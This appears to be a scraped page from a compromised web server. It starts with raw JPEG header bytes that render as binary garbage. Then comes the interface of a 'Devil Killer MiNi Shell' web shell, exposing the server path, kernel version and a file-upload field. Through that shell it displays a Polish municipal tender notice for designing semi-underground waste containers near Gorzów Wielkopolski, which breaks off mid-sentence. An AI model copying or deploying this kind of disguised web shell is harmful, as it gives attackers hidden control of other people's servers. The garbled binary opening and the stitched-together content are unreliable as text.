JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221026/0041192001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej na wykonanie pojemników półpodziemnych na terenie Gorzowa Wlkp. oraz obudów pojemników naziemnych na terenie gmin Bogdaniec, Deszczno, Kłodawa, Lubiszyn <br/>i Santok </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Związek Celowy Gmin MG-6</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 211035280</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sikorskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorzów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">957287101</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">957514618</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mg6@zcg.net.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zcg.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej na wykonanie pojemników półpodziemnych na terenie Gorzowa Wlkp. oraz obudów pojemników naziemnych na terenie gmin Bogdaniec, Deszczno, Kłodawa, Lubiszyn <br/>i Santok </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f78a3567-5539-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00411920</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00344327/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowej na wykonanie pojemników półpodziemnych na terenie Gorzowa Wlkp. oraz obudów pojemników naziemnych na terenie gmin Bogdaniec, Deszczno, Kłodawa, Lubiszyn i Santok</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie będzie realizowane przy dofinansowaniu ze środków pochodzących z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego – Lubuskie 2020 Oś Priorytetowa 4 „Środowisko i kultura”, Działanie 4.2 „Gospodarka odpadami” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f78a3567-5539-11ed-9171-f6b7c7d59353 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>4. Pozostałe informacje zawarte są w rozdziale XV SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje zawarte są w rozdziale XV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zawarte w rozdziale XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DK.271.1.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – obejmującą opracowanie dokumentacji projektowo-kosztorysowej w zakresie pojemników półpodziemnych na terenie Gorzowa Wielkopolskiego.<br/>1. Wykonawca zobowiązany jest do zaprojektowania gniazd półpodziemnych pojemników na odpady komunalne o<br/>pojemności ok. 3,0 m3 i ok. 5,0 m3, a także zgodnie z wymaganiami powszechnie obowiązującego prawa, norm<br/>technicznych, zobowiązany będzie także uzyskać niezbędne opinie, uzgodnienia, warunki techniczne, zgody i decyzje, w<br/>szczególności pozwoleń na budowę – lub odpowiednio dokonania zgłoszeń wykonania robót budowlanych.<br/>2. Zamawiający wymaga, żeby system zbierania i segregacji odpadów opierał się na pojedynczych pojemnikach<br/>zagłębionych w ziemi do ok. 2/3 wysokości (wg wytycznych producentów). Pojedyncze pojemniki wykonane winny być z<br/>materiału i o konstrukcji zapewniającej trwałość nie mniejszą niż 10 lat. Wymaga się by wyposażeniem podstawowym był<br/>również system zbierający odcieki z możliwością jednoczesnego opróżniania wraz z opróżnianiem Pojemnika. Kotwienie w<br/>gruncie zapewniające stabilność konstrukcji na terenach podmokłych, zarówno pod kątem statyki jak również pod kątem<br/>braku występowania korozji chemicznej i biologicznej.<br/>3. Opis składników Pojemników:<br/>1) prefabrykowany betonowy silos (np. w formie szczelnie połączonych kręgów betonowych) lub jednolity szczelny pojemnik<br/>z tworzywa sztucznego,<br/>2) pojemnik (komora) musi składać się z trzech głównych elementów:<br/>a) kontenera/worka podziemnego, który zawiera obudowę, klapy podłogowe, układ opróżniania id opróżniania i<br/>podwieszania kontenera,<br/>b) podłogi zabezpieczającej środowisko gruntowo-wodne przed wodami odciekowymi, podłoga szczelna, dostosowana do<br/>zróżnicowanych warunków występujących w wodach odciekowych z odpadów, tj. odporna na erozję chemiczną i<br/>biologiczną, kwasoodporna,<br/>c) modułu wrzutowego pokrytego ozdobnymi elementami (zabezpieczonymi przed oddziaływaniem warunków<br/>atmosferycznych).<br/>4. Kontener/worek jest elementem ruchomym, wyciąganym z silosu i jest opróżniany przy pomocy samochodu z dźwigiem<br/>HDS. Górna część kontenera pokrywa z klapami wrzutowymi stanowi osłonę pojemnika.<br/>5. W każdej z lokalizacji wstępnie przewidziano 6 pojemników: 5 na odpady selektywnie zbierane (w tym dwa na tworzywa<br/>sztuczne) oraz 1 na odpady zmieszane. Każdy z zestawów (gniazd) stanowić musi zestaw pojemników posadowionych<br/>obok siebie, w jednym wykopie.<br/>6. Mieszkańcy będą dostarczać odpady komunalne i samodzielnie umieszczać je w odpowiednich pojemnikach. Pojemniki<br/>muszą więc być opisane w sposób czytelny i nie budzący wątpliwości. Odpady z Pojemników będą odbierane przez<br/>specjalistyczny pojazd ciężarowy z żurawiem przeładunkowym (HDS – hydrauliczny dźwig samochodowy) i transportowane<br/>będą do dalszego przetwarzania – w pierwszej kolejności recyklingu i odzysku innymi metodami. W szczególności<br/>przewidzieć należy rozwiązania uniemożliwiające przedostanie się wód odciekowych z gromadzonych odpadów poza<br/>obszar Pojemników, do gruntu lub wód gruntowych. Kontenery/worki na zmieszane odpady komunalne oraz na odpady<br/>ulegające biodegradacji wyposażone muszą być w rezerwuar na odcieki. Podczas opróżniania worków odcieki wraz z<br/>odpadami muszą zostać opróżnione w całości na pojazd zbierający odpady komunalne.<br/>7. Zakres zamówienia obejmuje zaprojektowanie Pojemników do selektywnej zbiórki odpadów w następującym zakresie: 40<br/>szt. pojemników o pojemności 2,9-3,2 m3.<br/>Szczegółowy opis przedmiotu zamówienia zawiera Załącznik nr 2 do SWZ - OPZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione z wykorzystaniem poniżej wskazanych kryteriów w sposób określony w Rozdziale XII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Wykonawca zobowiązany jest do zaprojektowania obudów oraz utwardzenia terenu z betonowej kostki brukowej z<br/>odpowiednią podbudową pod ruch pieszy oraz obciążenie pojemników i obudów. Wykonawca zobowiązany jest do realizacji<br/>Przedsięwzięcia zgodnie z wymaganiami powszechnie obowiązującego prawa, norm technicznych, zobowiązany będzie<br/>także uzyskać niezbędne opinie, uzgodnienia, warunki techniczne, zgody i decyzje, w szczególności pozwoleń na budowę –<br/>lub odpowiednio dokonania zgłoszeń wykonania robót budowlanych.<br/>2. Dla każdej lokalizacji Wykonawca zobowiązany jest do zaprojektowania Obudów dla 5 pojemników – dla 5 frakcji<br/>odpadów (na pojemniki do 1,1 m3).<br/>3. Obudowy powinny być gr. min. 5 cm z 3 stron, zakotwione w podłożu, klapy metalowe, zabezpieczone przed korozją i<br/>malowane na odpowiedni kolor, wyposażone w amortyzatory zamknięcia, drzwi przednie zamykane, z zamkiem,<br/>4. Przewidzieć należy oznakowanie obudów w zależności od rodzaju gromadzonej w nim frakcji odpadów w postaci<br/>umieszczonej na pojemniku każdego typu, w widocznym miejscu, tabliczki z opisem oraz wyposażenie pojemników w<br/>pokrywy w odpowiednich kolorach. Przewidzieć należy następujący podział odpadów komunalnych:<br/>1) w pojemniku na metale i tworzywa sztuczne zbierane będą odpady komunalne stanowiące tworzywa sztuczne oraz<br/>opakowania metalowe i wielomateriałowe – opis pojemnika „METALE I TWORZYWA SZTUCZNE”, pokrywa pojemnika wraz<br/>z klapą otworu wrzutowego oraz tabliczka z opisem pojemnika w kolorze żółtym,<br/>2) w pojemniku na szkło zbierane będą odpady komunalne stanowiące opakowania szklane– opis pojemnika „SZKŁO”,<br/>pokrywa pojemnika wraz z klapą otworu wrzutowego oraz tabliczka z opisem pojemnika w kolorze zielonym,<br/>3) w pojemniku na papier zbierane będą odpady komunalne stanowiące papier i tekturę– opis pojemnika „PAPIER i<br/>TEKTURA”, pokrywa pojemnika wraz z klapą otworu wrzutowego oraz tabliczka z opisem pojemnika w kolorze niebieskim,<br/>4) w pojemniku na bioodpady („bio”) zbierane będą odpady komunalne stanowiące odpady ulegające biodegradacji (odpady<br/>kuchenne ulegające biodegradacji, odpady zielone – trawa, liście drobne gałęzie) – opis pojemnika „BIO”, pokrywa<br/>pojemnika wraz z klapą otworu wrzutowego oraz tabliczka z opisem pojemnika w kolorze brązowym,<br/>5) w pojemniku na odpady zmieszane zbierane będą zmieszane odpady komunalne (odpady resztkowe pozostałe po<br/>wysegregowaniu ww. frakcji odpadów) – opis pojemnika „ODPADY ZMIESZANE”, pokrywa pojemnika wraz z klapą otworu<br/>wrzutowego oraz tabliczka z opisem pojemnika w kolorze grafitowym.<br/>5. Nawierzchnie placów utwardzonych należy zaprojektować z betonowej kostki brukowej typ „behaton” z podbudową<br/>dostosowaną do warunków gruntowo-wodnych podłoża. Ewentualny dojazd do gniazd należy dostosować do ruchu<br/>ciężkiego, z odpowiednio wyprofilowanymi spadkami w celu odprowadzenia wód opadowych i roztopowych zgodnie z<br/>obowiązującym prawem – do istniejącego systemu kanalizacji deszczowej, a jeśli nie będzie to technicznie możliwe to w<br/>innym sposób dopuszczony obowiązującym prawem. Przy projektowaniu konstrukcji nawierzchni należy przyjąć okres<br/>eksploatacji nie mniejszy niż 20 lat. Maksymalna powierzchnia terenów utwardzonych placów i dróg wyniesie łącznie do ok.<br/>30 m2. W poszczególnych lokalizacjach Wykonawca zobowiązany jest dostosować oznakowanie pionowe i poziome, do<br/>istniejącego w niezbędnym zakresie.<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SWZ - OPZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione z wykorzystaniem poniżej wskazanych kryteriów w sposób określony w Rozdziale XII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu dotyczący zdolności zawodowej zostanie uznany za spełniony, jeżeli Wykonawca wykaże,<br/>że:<br/>Dla części I zamówienia<br/>a) wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, w sposób należyty co najmniej 1 usługę projektową obejmującą sporządzenie wielobranżowej<br/>dokumentacji projektowo-kosztorysowej wraz z uzyskaniem niezbędnych pozwoleń / zgłoszeń na budowę lub przebudowę:<br/>- pojemników półpodziemnych/podziemnych/baterii pojemników podziemnych lub<br/>- instalacji podziemnej lub<br/>- parkingu podziemnego<br/>o wartości minimum 60.000 zł netto.<br/>b) dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada uprawnienia do projektowania w specjalności<br/>architektonicznej bez ograniczeń oraz posiada minimum 3 letnie doświadczenie zawodowe i zrealizowała co najmniej 1<br/>usługę projektową polegającą na sporządzeniu wielobranżowej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem<br/>niezbędnych pozwoleń / zgłoszeń na budowę lub przebudowę:<br/>- pojemników półpodziemnych/podziemnych/baterii pojemników podziemnych lub<br/>- instalacji podziemnej lub<br/>- parkingu podziemnego<br/>c) dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada uprawnienia do projektowania w specjalności<br/>konstrukcyjno - budowlanej bez ograniczeń oraz posiada minimum 3 letnie doświadczenie zawodowe i zrealizowała co<br/>najmniej 1 usługę projektową polegającą sporządzeniu wielobranżowych dokumentacji projektowo-kosztorysowych wraz z<br/>uzyskaniem niezbędnych pozwoleń / zgłoszeń na budowę lub przebudowę:<br/>- pojemników półpodziemnych/podziemnych/baterii pojemników podziemnych lub<br/>- instalacji podziemnej lub<br/>- parkingu podziemnego.<br/>Dla części II zamówienia<br/>a) wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, w sposób należyty co najmniej 1 usługę projektową obejmującą sporządzenie wielobranżowej<br/>dokumentacji projektowo-kosztorysowej wraz z uzyskaniem niezbędnych pozwoleń / zgłoszeń na budowę lub przebudowę:<br/>- obudów pojemników lub,<br/>- pojemników półpodziemnych/podziemnych/baterii pojemników podziemnych lub<br/>- instalacji podziemnej lub<br/>- parkingu podziemnego<br/>o wartości minimum 160.000 zł netto.<br/>b) dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada uprawnienia do projektowania w specjalności<br/>architektonicznej bez ograniczeń oraz posiada minimum 3 letnie doświadczenie zawodowe i zrealizowała co najmniej 1<br/>usługę projektową polegającą na sporządzeniu wielobranżowej dokumentacji projektowo-kosztorysowej wraz z uzyskaniem niezbędnych pozwoleń / zgłoszeń na budowę lub przebudowę:<br/>- obudów pojemników lub,<br/>- pojemników półpodziemnych/podziemnych/baterii pojemników podziemnych lub<br/>- instalacji podziemnej lub<br/>- parkingu podziemnego<br/>c) dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada uprawnienia do projektowania w specjalności<br/>konstrukcyjno - budowlanej bez ograniczeń oraz posiada minimum 3 letnie doświadczenie zawodowe i zrealizowała co<br/>najmniej 1 usługę projektową polegającą sporządzeniu wielobranżowych dokumentacji projektowo-kosztorysowych wraz z<br/>uzyskaniem niezbędnych pozwoleń / zgłoszeń na budowę lub przebudowę:<br/>- obudów pojemników lub,<br/>- pojemników półpodziemnych/podziemnych/baterii pojemników podziemnych lub<br/>- instalacji podziemnej lub<br/>- parkingu podziemnego<br/>Zamawiający dopuszcza połączenie wyżej wskazanych specjalności w poszczególnych branżach pod warunkiem spełnienia<br/>przez osobę łączącą te 